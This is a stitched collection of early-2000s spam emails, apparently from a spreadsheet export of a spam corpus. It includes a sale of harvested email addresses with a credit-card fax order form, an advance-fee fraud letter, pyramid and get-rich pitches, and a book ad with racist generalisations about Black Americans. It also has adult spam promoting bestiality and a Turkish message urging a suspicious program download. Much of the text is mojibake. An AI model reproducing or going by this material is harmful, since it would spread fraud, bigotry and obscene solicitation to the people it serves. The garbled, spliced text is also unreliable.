Just think of it, over 300 million people will see your advert, if only a fraction of them was to buy your product/services, think of all the money you would be earning. Are the fax numbers fresh? How many are deliverable? The 1.5 million fax number list has been verified within the last three months and is very fresh and deliverable. Are the fax numbers sorted by name or business type? The 1.5 million fax number list is sorted by area code only. It is not sorted by business name, business type. What file format are the fax numbers in? The 1.5 million fax number list is in a standard text file format (.txt), and is not separated by commas or quotes. The list is compiled in a one-fax number per line method, suitable for importing into most of the popular fax software programs.** The CD is as easy to use as browsing your C drive in Explorer. **NOW YOU CAN ADVERTISE FREE AND GET TREMENDOUSLY
MORE RESPONSES THAN ADVERTISING WITH OTHER FORMS OF MEDIA!! ORDER NOWHOW THIS DIRECTORY WAS COMPILED:* Virtually every other email directory on the Internet was taken and put through an extensive email verification process thus eliminating all the dead addresses.
* Special software spiders through the web searching websites, newsgroups and many other online databases with given keywords like area codes, industries, city names etc.. To find millions of fresh new addresses every week.TURN YOUR COMPUTER INTO A MONEY MACHINE!Most estimate well over 400 MILLION people will have E-mail accounts in the next 2Years!  E-Mail turns your computer into a Money Machine by giving you, immediate access to all of them. Don't you think some of the more than 300 million people with E-mail addresses would be interested in your products or Services?MUCH FASTER:  With E-mail you get responses back in 1 to 4 days instead of waiting weeks or months!  You can begin filling orders the same day you send E-mail ADVERTISING WORTH MILLIONS:  It costs millions of dollars to mail.DO NOT REPLY TO THIS E-MAIL ADDRESS. TO ORDER, READ BELOW:ORDER BY CREDIT CARD (VISA, MASTERCARD OR AMERICAN EXPRESS) Simply complete the order form below and fax it back
 TO   1- (240) 371-0672
Make sure that we have your e-mail address so that we can send you a reciept for your transaction.CREDIT CARD ORDERS FAX THIS ORDER FORM BACK
TO   1- (240) 371-0672ORDER FORM (Please PRINT clearly)
Name:										
Company Name:									
Email Address:								
Tel#:										
Shipping Address:								
City:											
State/Province:									 
Zip/Postal Code:	 							
Country:											PRODUCT ORDER FORM:
[ ] 300 MILLION EMAIL ADDRESSES on 3 CDs		$  99.95
     And 1. Million USA Business Fax Numbers			SHIPPING OPTIONS
[ ] Regular Mail (1-2)weeks delivery 	     $  5.50
[ ] Priority Mail(2-4)business days 		     $12.50
[ ] FedEx Overnight For US &amp; Canada Only  $25.50 Int'l orders extra                                                      
Only For FedExTOTAL AMOUNT TO BE PAID: 	$			USDFOR CREDIT CARD ORDERS, THIS INFO MUST BE ENCLOSED:[] VISA  [] MASTERCARD  [] AMERICAN EXPRESSCard #:											
Expiry Date:										
Name on Card:								  		
City:											
State/Province:									 
Zip/Postal Code:	 							
Country:											
Last 3 digits on reverse of card next to signature:
(     ) - (     ) - (     ) TOTAL AMOUNT: $			USD
I agree to pay the above total amount according to my card issuer agreement.Authorized Signature: X			 Date:	   2002	
Please note that FT International will appear on your statement.CREDIT CARD ORDERS FAX THIS ORDER FORM BACK
TO   1- (240) 371-0672
MAIL ORDERS SEND THIS ORDER FORM BACK TOGETHER WITH A MONEY ORDER PAYABLE TO (F.T International). FOR THE BALANCE TO:MAILING ADDRESS:
FUTURE TECH INTERNATIONAL
Import Export Company
1300 Don Mills Road Suite 211
Don Mills Ontario, Canada 
M3B 2W6PLEASE DO NOT SEND POSTAL MONEY ORDERSFOR ANY QUESTIONS PLEASE FEEL FREE TO CALL US AT 1 (416) 410-9364To be removed from our database please send a fax to   1-970-289-6524
</t>
  </si>
  <si>
    <t xml:space="preserve">                   Welcome to "Ghetto" America!
ï¿½...Yes, you heard me; I said "Ghetto" America! What is "Ghetto" 
America, I'm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male's tough or 
cool neighborhood reputation.
The author also identifies the self-destructive and often 
criminal behavior that many young black men perpetuate on a daily 
basis like, refusing to pursue higher education, carrying guns, 
robbing, stealing, selling drugs, driving fancy cars, and wearing 
expensive jewelry. The negative and self-debasing behavior 
committed by both males, and females is due in large part to a 
lack of guidance resulting from having been reared in fatherless 
homes. These poor choices, and behavioral disorders coupled with 
the unnecessary burden that it places on tax paying citizens in 
the form of welfare abuse, and over crowded prison populations 
are the center causes for the cycle of rampant poverty, and lack 
of direction that currently exists in young "Black America" 
today. To learn more about this dynamic self contained society 
visit www.BlackRealityPublishing.com and reserve your copy today! 
               To request an excerpt please email                  
               Books@BlackRealityPublishing.com 
            Buy this soon to be "Best Seller" now!
                www.BlackRealityPublishing.com
</t>
  </si>
  <si>
    <t xml:space="preserve">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Backovia, svog potpredsednika. Backovic se ovih dana zeni, jednom  mladom socijalistkinjom koja je clan saveta mladih, a u isto vreme i sestra jednog od clanova IO GO SPS-a, za kuma uzima jos jednog mladog socijalistu iz Saveta mladih. Sve u svemu, mladi u SPS se drze kao italijanske mafijaske porodice 60-tih u SAD.
          Sta ce se do kraja price dogoditi ostaje pitanje, no clanstvo i simpatizeri ce oceniti rad svog rukovodstva na predsednickim izborima.
          Pimato se samo, sta ce da rade, ako im Bata prodje losije od Seselja koga je predsednik Slobodan Milosevic podrzao za predsednickog kandidat?_______________________________________________________________________
Powered by List Builder
To unsubscribe follow the link:
http://lb.bcentral.com/ex/sp?c=15279&amp;s=90B245569C3B981A&amp;m=4
</t>
  </si>
  <si>
    <t>ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½
ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Rï¿½ï¿½ï¿½{ï¿½ï¿½ï¿½[ï¿½Vï¿½ï¿½ï¿½ï¿½
ï¿½ï¿½ï¿½ï¿½ï¿½[ï¿½^ï¿½rï¿½fï¿½Iï¿½iï¿½cï¿½uï¿½cï¿½jï¿½ï¿½ï¿½ï¿½
ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½cï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½
ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½I
http://book-i.net/mutou
ï¿½ï¿½ï¿½iï¿½ï¿½
ï¿½ï¿½ï¿½ï¿½ï¿½`ï¿½ï¿½ï¿½@ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½cï¿½n9ï¿½@ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½
ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½132ï¿½ï¿½ï¿½iï¿½Bï¿½Dï¿½]ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½I
(^-^)/~ï¿½ï¿½ï¿½ï¿½ï¿½Fï¿½ï¿½ï¿½ï¿½ï¿½gï¿½[To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-bugs" in the body of the message</t>
  </si>
  <si>
    <t xml:space="preserve">
Untitled Documentwindow.open("http://www.ouweilighting.com");
Ou Wei Lighting, Nights Will Be Lightening!!!  ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ 
  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ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½
ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½
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http://www.ouweilighting.com 
  ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½
ï¿½ï¿½ï¿½ï¿½:0760-2312136 
ï¿½ï¿½ï¿½ï¿½:0760-2317010
Email:ouwei@ouweilighting.com
ï¿½ï¿½ï¿½ï¿½:ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½
ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ 
ï¿½ï¿½ ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½
OU WEI LIGHTING, NIGHTS WILL BE LIGHTENEDï¿½ï¿½
Brief Introduction
Since founded in 1996, Ou Wei lighting Co.,ltd. has succeed in manufacturing 
  the Projection Lighting, Ceiling&amp;Hanging Lighting, Inlaid Lighting. The 
  products have stepped to professionalizing and seriesing development , applying 
  to the lighting of the markets, hotels, office buildings, house roomsï¿½ï¿½engineerings 
  and projects.
We are expecting your cooperation and trade, and welcome to our homepage (www.ouweilighting.com) 
  or contact us by:
Tel: 0760-2312136 
Fax:0760-2317010
Add: Sen Li lighting city, Haizhou Guzhen, Zhongshan, Guangdongï¿½ï¿½
Email:ouwei@ouweilighting.com
Thank you a lot!
ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ 
OU WEI LIGHTING CO., LTD. var tc_user="ouwei";var tc_class="4";</t>
  </si>
  <si>
    <t xml:space="preserve">
Sunfrom lighting&lt;!--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window.open("http://www.chinalightingmarket.com");
//--&gt;
            ï¿½ï¿½WEBSITE:  
ï¿½ï¿½ www.chinalightingmarket.com Â 
TEL: 00-86-760-2345350 
                    FAX: 00-86-760-2345350
                    MOBILE :(00-86) 13703047547 MR. DAVID
E-MAIL: 
                    sunfrom@chinalightingmarket.com
ADD: ROOM401, NO.19,XINXINGZHONGROAD, GUZHEN, 
                    ZHONGSHAN, GUANGDONG, CHINAÂ 
var tc_user="sunfrom";var tc_class="4";power 
              by 360cn.comï¿½ï¿½ </t>
  </si>
  <si>
    <t>ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½
ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Rï¿½ï¿½ï¿½{ï¿½ï¿½ï¿½[ï¿½Vï¿½ï¿½ï¿½ï¿½
ï¿½ï¿½ï¿½ï¿½ï¿½[ï¿½^ï¿½rï¿½fï¿½Iï¿½iï¿½cï¿½uï¿½cï¿½jï¿½ï¿½ï¿½ï¿½
ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½cï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½
ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½I
http://book-i.net/mutou
ï¿½ï¿½ï¿½iï¿½ï¿½
ï¿½ï¿½ï¿½ï¿½ï¿½`ï¿½ï¿½ï¿½@ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½cï¿½n9ï¿½@ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½
ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½132ï¿½ï¿½ï¿½iï¿½Bï¿½Dï¿½]ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½I
(^-^)/~ï¿½ï¿½ï¿½ï¿½ï¿½Fï¿½ï¿½ï¿½ï¿½ï¿½gï¿½[
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-ports" in the body of the message</t>
  </si>
  <si>
    <t>ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½
ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Rï¿½ï¿½ï¿½{ï¿½ï¿½ï¿½[ï¿½Vï¿½ï¿½ï¿½ï¿½
ï¿½ï¿½ï¿½ï¿½ï¿½[ï¿½^ï¿½rï¿½fï¿½Iï¿½iï¿½cï¿½uï¿½cï¿½jï¿½ï¿½ï¿½ï¿½
ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½cï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½
ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½I
http://book-i.net/mutou
ï¿½ï¿½ï¿½iï¿½ï¿½
ï¿½ï¿½ï¿½ï¿½ï¿½`ï¿½ï¿½ï¿½@ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½cï¿½n9ï¿½@ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½
ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½132ï¿½ï¿½ï¿½iï¿½Bï¿½Dï¿½]ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½I
(^-^)/~ï¿½ï¿½ï¿½ï¿½ï¿½Fï¿½ï¿½ï¿½ï¿½ï¿½gï¿½[
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-questions" in the body of the message</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;äº‹æ¥­è€…&gt;
æ°å:Vip-mail
çªç„¶ã®ãƒ¡ãƒ¼ãƒ«å¤±ç¤¼ã„ãŸã—ã¾ã™ã€‚
ä»Šå¾Œã“ã®åºƒå‘ŠãŒã”ä¸è¦ãªæ–¹ã¯ãã®æ—¨ã‚’
stop-vip@e-project-web.com
ã¾ã§ãŠé€ã‚Šä¸‹ã•ã„ã€‚â˜†â˜…â˜†â˜…â˜†â˜…â˜†â˜…â˜†â˜…â˜†â˜…â˜†â˜…â˜†â˜…â˜†â˜…â˜†â˜…â˜†â˜…â˜†â˜…â˜†
â™ªãƒªãƒƒãƒãªå‡ºä¼šã„ã¯Vip-mailã§â™ª
Vip-mailãŒãƒã‚¤ã‚¯ãƒ©ã‚¹ãªå‡ºä¼šã„ã‚’ãƒ—ãƒ¬ã‚¼ãƒ³ãƒˆâ˜†
æºå¸¯3ã‚­ãƒ£ãƒªã‚¢ã¨PCå¯¾å¿œã®å‡ºä¼šã„ã‚µã‚¤ãƒˆâ™ª
ä»Šã¾ã§ã®å‡ºä¼šã„ã‚µã‚¤ãƒˆã«é£½ããŸäºº!
å‡ºä¼šã„ã¯æ¬²ã—ã„ã‘ã©ã‚µã‚¤ãƒˆã‚’ä½¿ã†ã®ã¯ã¨è¿·ã£ã¦ã‚‹äºº!
ä»Šç›´ãVip-mailã«Go!!!!!
http://www.vip-jp.net/?sid=2
å¥³æ€§ç„¡æ–™ã¯å½“ãŸã‚Šå‰!?
ç”·æ€§ã«ã¯ãŠè©¦ã—ãƒã‚¤ãƒ³ãƒˆ50ptãƒ—ãƒ¬ã‚¼ãƒ³ãƒˆâ˜†
å¥³æ€§ã¯ãƒªãƒƒãƒãªç”·æ€§ã‚’GETã—ã‚ˆã†o(â‰§âˆ‡â‰¦)o
ç”·æ€§ã¯ãŠè©¦ã—ãƒã‚¤ãƒ³ãƒˆæ°—ã«å…¥ã£ãŸå¨˜ã‚’è¦‹ã¤ã‘ã‚ˆã†(âˆ‡ï¼œ)b
å‡ºä¼šã„ã‚’æ±‚ã‚ã‚‹ãªã‚‰Vip-mailã«ä»Šç›´ãã‚¢ã‚¯ã‚»ã‚¹
â†“â†“â†“â†“â†“â†“â†“â†“â†“â†“â†“â†“â†“â†“
http://www.vip-jp.net/?sid=2
â˜†â˜…â˜†â˜…â˜†â˜…â˜†â˜…â˜†â˜…â˜†â˜…â˜†â˜…â˜†â˜…â˜†â˜…â˜†â˜…â˜†â˜…â˜†â˜…â˜†çªç„¶ã®ãƒ¡ãƒ¼ãƒ«å¤±ç¤¼ã„ãŸã—ã¾ã—ãŸã€‚
ä»Šå¾Œã“ã®åºƒå‘ŠãŒã”ä¸è¦ãªæ–¹ã€é…ä¿¡åœæ­¢ã‚’å¸Œæœ›ã•ã‚Œã‚‹æ–¹ã¯ãã®æ—¨ã‚’
stop-vip@e-project-web.com
ã¾ã§ãŠé€ã‚Šä¸‹ã•ã„
</t>
  </si>
  <si>
    <t xml:space="preserve">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Backovia, svog potpredsednika. Backovic se ovih dana zeni, jednom  mladom socijalistkinjom koja je clan saveta mladih, a u isto vreme i sestra jednog od clanova IO GO SPS-a, za kuma uzima jos jednog mladog socijalistu iz Saveta mladih. Sve u svemu, mladi u SPS se drze kao italijanske mafijaske porodice 60-tih u SAD.
          Sta ce se do kraja price dogoditi ostaje pitanje, no clanstvo i simpatizeri ce oceniti rad svog rukovodstva na predsednickim izborima.
          Pimato se samo, sta ce da rade, ako im Bata prodje losije od Seselja koga je predsednik Slobodan Milosevic podrzao za predsednickog kandidat?_______________________________________________________________________
Powered by List Builder
To unsubscribe follow the link:
http://lb.bcentral.com/ex/sp?c=15279&amp;s=54EE057E0B6864FB&amp;m=5
</t>
  </si>
  <si>
    <t/>
  </si>
  <si>
    <t xml:space="preserve">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
</t>
  </si>
  <si>
    <t xml:space="preserve">
SMSTR lilhwmuxvrsyqcwjhvttxw
Degerli SMSTR kullanicimiz
SMS programimiz ï¿½esitli aksakliklar sebebi ile kullanilamaz hale gelmistir. Bu 
sebepten dolayi yeni bir program hazirlamak zorunda kaldik. Programi asagidaki linki 
kullanarak indirebilirsiniz. Programi biz virï¿½s kontrolï¿½nden geï¿½irmis bulunmaktayiz.
Bu yeni versiyonda sms in yerine ulasma hizi ï¿½ok daha artirilmistir. Ayrica sinirsiz 
ve toplu sms gï¿½nderebilirsiniz. ï¿½ok yakinda logo ve melodi transferi hizmetimiz 
acilacaktir. Sizi bir sure sinirsiz smsden mahrum ettigimiz icin ozur 
dileriz.
SMSTR
Versiyon 7.3 u indirmek iï¿½in buraya tiklayiniz
</t>
  </si>
  <si>
    <t>My name is Jeremy Lessaris. I'm looking for investment properties in the Midwest. The issue I've been having is that not every everyone deals with the properties I'm looking for. You know the houses that you are almost sure will not sell; maybe they're really ugly or need a lot of work or are in a bad neighborhood. But for what ever reason, the houses just don't sell.I need those houses...Most of the agents I've dealt with were hesitant because there isn't much of a return for what time and effort you invest. However, the private investors I work with use "unconventional" private funding so we both can avoid long drawn out loan approvals. In fact most cases we just pay cash and close in a week. I am pre-qualified with Greentree Funding for up to $900,000 for a purchase money mortgage based on a non-owner occupied loan at 90% LTV.  (And of course you get your full commission.) I'm not a licensed real estate agent nor am I affiliated with any real estate firm, which means I can work with you just about any way you want. Please don't be under the impression that we have to pay under market value to be interested. Sometimes I can even pay retail price. The only guarantee I'll make is that I will not waste your time, and in most cases I can tell you over the phone whether I'm interested or not. If you are looking to purchace a project home from our inventory or would like information on forming an alliance with  Synteligent Properties, please contact me @ 847.366.4300 or email me @ jeremy@synteligent.com Best Wishes, 
Jeremy Lessaris
847.366.4300
www.synteligent.com
jeremy@synteligent.com
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-ports" in the body of the message</t>
  </si>
  <si>
    <t xml:space="preserve">Are you interested in making some extra money on the internet?
well have i got something for you. Last week i made $3500 ,I am offering you 5 yes 5 web sites that have already been made and are waiting for you to put up to make money with.  There is also a few videos that are included that tell you Exactly what you have to do to be successful. I am going to also Offer you the rights to the web pages and to 5 Ebooks that you can sell..  These Ebooks aren't just any Ebooks these are books on how to make money on the  internet.  I am selling this package deal for a short time only at the low price of $39.77 my friends all say that i am   Crazy.. The web site alone is worth over $1500 and its yours for only $39.77.  Each eBook you will receive is worth around $350.  my web page is. www.Home-Business-onthe-net.com . please come take a look. 
if you have any questions please feel free to give me a email.
if you'd like a Free Ebook just give me a email and ill  email you one ASAP.Sincerly 
Your friend
KeeganClick on the link below to remove yourself
http://www.hotresponders.com/cgi-bin/varpro/r.cgi?id=keegan007&amp;a=ilug@linux.ieAOL Users
 Remove Me-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Are you tired of spending a fortune on printer cartridges?  
Are you tired of making a mess trying to refill your old cartridges?
Then here's your answer......
PRINTER CARTRIDGES FOR UP TO 50% OFF STORE PRICESThe average person spends over $150 on new cartridges per year.....DON'T BE ONE OF THEM...EMAIL TODAY!
PLEASE DO NOT USE THE REPLY BUTTONCLICK HERE:    printerink1@cbphost.netJust include your printer or cartridge type, and we will email you back 
the price, its that simple.  THIS WILL SAVE YOU LOTS OF MONEY!!  Be 
sure to ask about our referral discount for passing the savings on to a 
friend.  
If we don't save you $$, you have lost nothing!    In addition, just 
reply with your printer type, and be automatically entered in our 
monthly $50 gift certificate drawing.We just wanted to save you some money, but to unsubscribe to this 
mailing email here:  printerink2@cbphost.net   and just type 'REMOVE' in 
the subject line
</t>
  </si>
  <si>
    <t xml:space="preserve">mailv07a.gifYou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</si>
  <si>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FROM: COL. MICHAEL BUNDU. 
DEMOCRATIC REPUBLIC OF CONGO. 
Tel No: Your country Intl. access code +8821652098236
email : mikebundu@rediffmail.com
Dear Sir/Madam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(US$20,500,000.00) to fight the rebel
group. We were then given this money privately 
by the then President, LAURENT KABILA, without the knowledge of other
Cabinet Members. But when President Kabila 
was killed in a bloody shoot-out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 which we have worked 
so hard for. Thus, if you are willing to assist us to move this fund out
of Congo, you can contact me through my email 
addresses, Tel/Fax nos. above with your telephone, fax number and personal
information to enable us discuss the 
modalities and what will be your share (percentage) for assisting us.Please note that There are no RISKS involved in this Deal as everyone's
Security is Guaranteed if we follow the required 
guidelines. I will hence furnish you with further details of this Deal as
soon as I am assured of your Sincere interest to assist 
us. I must use this opportunity and medium to implore you to exercise the
utmost indulgence to keep this matter extraordinarily 
confidential, Whatever your decision, while I await your prompt response.
Thank you and God Bless. 
Best Regards 
COL. MICHAEL BUNDU(RTD). m_bundu@rediffmail.comN\B. When you are calling my line, you dial your country Intl. access
code, then you dial directly, do not include my country 
code i.e. (243). Just dial your country Intl. access code + 88216
52098236. You can also contact me through the above 
email addresses.-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</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</si>
  <si>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now.Click_Herehttp://209.202.221.16/director.asp?id=1&amp;target=http://211.167.74.101/mortg/
Sincerely,Chalres M. Gillette
MortCorp, LLColhfilghxvuyfkfqbviqgacyenuuufpyswymlajxucqhpojagplujpmovuiaphwlqkkstgipemliwuugqptjukjklbjlgxqmuogtiwhhdlhjhkbucvbyqvgfp__________________________________________________________________
The NEW Netscape 7.0 browser is now available. Upgrade now! http://channels.netscape.com/ns/browsers/download.jsp Get your own FREE, personal Netscape Mail account today at http://webmail.netscape.com/
</t>
  </si>
  <si>
    <t xml:space="preserve">Volume 8, Issue 35 - Sept. 2002
CLICK HEREÂ 
Â 
I no longer wish to receive your newsletter click hereurfrdemubblkunmdbyh
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Free Member,You were gifted a free membership in cash 
wave generator.  Our records indicate your 
membership is about to expire and you have 
not locked in your cash wave income by 
registering for your free position.
If you do not register, you will forfeit 
all commissions from spillover.To confirm your interest in locking in your 
position, and for a chance to win $500, use the link 
mailto:workinathome@btamail.net.cn?subject=Send_CW_Info_PleaseYou will receive an email with instructions 
and where to go to lock in your position and 
secure your commissions from spillover.Cash Wave Generator Administration
1-800-242-0363, ext. 1993To be excluded from future notices:
mailto:guaranteed4u@btamail.net.cn?subject=exclude  </t>
  </si>
  <si>
    <t xml:space="preserve"> A man endowed with a 7 - 8" hammer is simply
 better equipped than a man with a 5 - 6" hammer. 
Would you rather havemore than enough to get the job done or fall very short. It's totally upto you. Our Methods are guaranteed to increase your size by 1 - 3" Enter here and see how
</t>
  </si>
  <si>
    <t xml:space="preserve">
untitled
ATTENTION: This is a MUST for ALL Computer Users!!!*NEW-Special Package Deal!*Norton SystemWorks 2002 Software Suite -Professional Edition-Includes Six - Yes 6! - Feature-Packed Utilities
ALL For 1 Special LOW Price!6 Feature-Packed Utilities...1 Great Price!
A $300+ Combined Retail Value!FREE Shipping!Click Here Now!
</t>
  </si>
  <si>
    <t xml:space="preserve">Click here to see the Bang BusIt is wild!!!!!!
tepyycemkckiflbsvpcyi
</t>
  </si>
  <si>
    <t xml:space="preserve">New Account For: zzzz@spamassassin.taint.org
##################################################
#                                                #
#          Free XXX Links .org is a              #
#          non-profit organization               #
#                                                #
#           Offering the best in                 #
#       adult entertainment for free.            #
#                                                #
##################################################&gt;&gt;&gt;&gt;&gt;  INSTANT ACCESS TO ALL SITES NOW
&gt;&gt;&gt;&gt;&gt;  Your User Name And Password:
&gt;&gt;&gt;&gt;&gt;  User Name: zzzz@spamassassin.taint.org
&gt;&gt;&gt;&gt;&gt;  Password: 818932Test it out NOW!   Adults Farm
http://rd.yahoo.com/*http://80.71.71.88/farm/?aid=818932
Girls and Animals Getting Freaky....FREE Lifetime Membership!!6 of the Best Adult Sites on the Internet for FREE!
---------------------------------------
NEWS 09/05/02
With just over 3.9 Million Members that signed up for FREE, Last month there were 894,457 New
Members. Are you one of them yet???
---------------------------------------
Our Membership FAQQ. Why are you offering free access to 6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6 membership sites?
A. No just one to get access to all of them.Q. How do I get started?
A. Click on one of the following links below to become a member.- These are multi million dollar operations with policies and rules.
- Fill in the required info and they won't charge you for the Free pass!
- If you don't believe us, just read their terms and conditions.---------------------------# 6. &gt; XXX Adults Farm
http://rd.yahoo.com/*http://80.71.71.88/farm/?aid=818932
Girls and Animals Getting Freaky....FREE Lifetime Membership!!# 5. &gt; Sexy Celebes Porn
http://rd.yahoo.com/*http://80.71.71.88/celebst/?aid=818932
Thousands Of XXX Celebes doing it...FREE Lifetime Membership!!# 4. &gt; Play House Porn
http://rd.yahoo.com/*http://80.71.71.88/play/?aid=818932
Live Feeds From 60 Sites And Web Cams...FREE Lifetime Membership!!# 3. &gt; Asian Sex Fantasies
http://rd.yahoo.com/*http://80.71.71.88/asian/?aid=818932
Japanese Schoolgirls, Live Sex Shows ...FREE Lifetime Membership!!# 2. &gt; Lesbian Lace
http://rd.yahoo.com/*http://80.71.71.88/lesbian/?aid=818932
Girls and Girls Getting Freaky! ...FREE Lifetime Membership!!# 1. &gt; New! just added today: Mage Porn Site
http://rd.yahoo.com/*http://80.71.71.88/mega/?aid=818932
950,00 Pics, 90,000 Movies, Live Sex Shows... FREE Lifetime Membership!!
--------------------------Jennifer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http://rd.yahoo.com/*http://80.71.71.88/optout/ . Please allow 24 hours for removal.mdnfhmobawljhlqtotlhpikemcywuc
</t>
  </si>
  <si>
    <t xml:space="preserve">
Hello, jm@spamassassin.taint.orgHuman Growth Hormone Therapy
Lose weight while building lean muscle massand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it's Guaranteed!
Lose WeightBuild Muscle ToneReverse Aging
Increased Libido
          Duration Of Penile Erection
Healthier Bones
Improved MemoryImproved skinNew Hair GrowthWrinkle Disappearance   Visit Our Web Site and Learn The Facts : Click Here  If the above link is not operational, Please Click 
  Here again.
  You are receiving this email as a subscriber
  to the Opt-In America Mailing List. 
  To remove yourself from all related maillists,
  just Click 
  Here</t>
  </si>
  <si>
    <t xml:space="preserve">+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  Take Control of Your Computer With This Top-of-the-Line Software! +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++               
                 Symantec SystemWorks 2002
              -=Professional Software Suite=-
This Special Package Includes Six - Yes 6! - Feature-Packed UtilitiesALL for 1 Special LOW Price of Only $29.99!This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
</t>
  </si>
  <si>
    <t xml:space="preserve">Get your favorite Poker action at http://www.multiplayerpoker.netPlay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as:Hold'em, Omaha
Omaha Hi/Lo
7 Card Stud
7 Card Stud Hi/Lo
5 Card Stud
Poker tournamentsSign up today and start playing with new &amp; old friends...download our free
software now at http://www.MultiPlayerPoker.netCurrent Promotion:
  Â· $50 Deposit Bonus! - 100% bonus!
  Â· Daily High Hand - $250 Daily.
  Â· Progressive Bad Beat Jackpot - $2,000.00 minimum with $100.00 added
daily.
  Â· Tournaments - Multiplayer shootouts.
wish not to received any further e-mail from us please click
